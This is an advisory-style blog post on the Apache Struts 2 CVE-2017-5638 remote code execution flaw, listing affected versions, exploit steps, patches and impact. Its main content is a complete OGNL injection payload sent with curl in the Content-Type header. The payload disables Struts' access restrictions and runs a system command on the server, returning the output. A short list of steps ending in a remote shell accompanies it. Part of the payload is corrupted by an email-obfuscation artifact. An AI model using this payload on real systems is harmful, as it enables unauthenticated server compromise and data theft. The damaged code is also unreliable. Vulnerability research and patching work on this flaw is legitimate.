Listen to this Post
The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in an HTTP request to a Struts 2 endpoint, the parser incorrectly processes it while attempting to generate an error message. The attacker can embed an Object-Graph Navigation Language (OGNL) expression within this malformed header. Due to the flawed implementation, the framework evaluates this OGNL expression on the server-side during the error-handling routine, rather than treating it as a simple string. OGNL is a powerful expression language that allows for method execution and access to the underlying Java runtime. This improper evaluation gives the attacker the ability to execute arbitrary system commands with the same privileges as the Struts application server, leading to full server compromise. The attack is particularly dangerous because it is easy to exploit and does not require authentication, making it a weapon of choice for widespread attacks.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’whoami’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-endpoint`
How Exploit:
Craft malicious HTTP request.
Embed OGNL in Content-Type.
Send to Struts endpoint.
OGNL executes server-side.
Gains remote shell.
Protection from this CVE
Apply vendor patch.
Upgrade Struts version.
Use input validation WAF.
Restrict server network access.
Impact:
Full system compromise.
Data theft.
Service disruption.
Malware installation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
